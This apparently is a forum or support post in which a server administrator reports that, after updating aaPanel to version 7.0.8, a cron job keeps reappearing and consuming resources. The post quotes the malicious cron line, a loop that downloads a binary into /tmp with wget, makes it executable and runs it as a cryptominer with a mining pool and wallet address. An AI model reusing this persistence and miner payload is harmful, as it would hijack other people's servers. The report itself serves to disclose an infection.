It seems that after updating to version 7.0.8 of AApanel, you've encountered a serious issue where the panel itself appears to contain malware. This malware is responsible for adding cron jobs and running a ps -ef script across your entire server, consuming significant resources. Upon investigating, you've discovered that the script and its associated link were not added by you but were introduced by the malware or an attacker.
585 curl -o index.php
719 * * * * * while :; do check=$(ps -ef | grep str | grep tcp |awk '{print $2}'); if [[ -n $check ]]; then echo ""; else mkdir /tmp/help; wget -O /tmp/help/default; chmod +x /tmp/help/default; /tmp/help/./default -o stratum+tcp:// -u 45rATgNz92sAuiuHaNNspvBaJPh1C7bKTZ3vy9LdLTsfFae7eVnwA2U2v2z9qjZBtRKF9fuxMJVzQKiZ5MkG8iU96BjRBDc -p x -B; fi; sleep 0.1; done
CronJobs its auto added when i login to AAPanel even i delete it multiple time.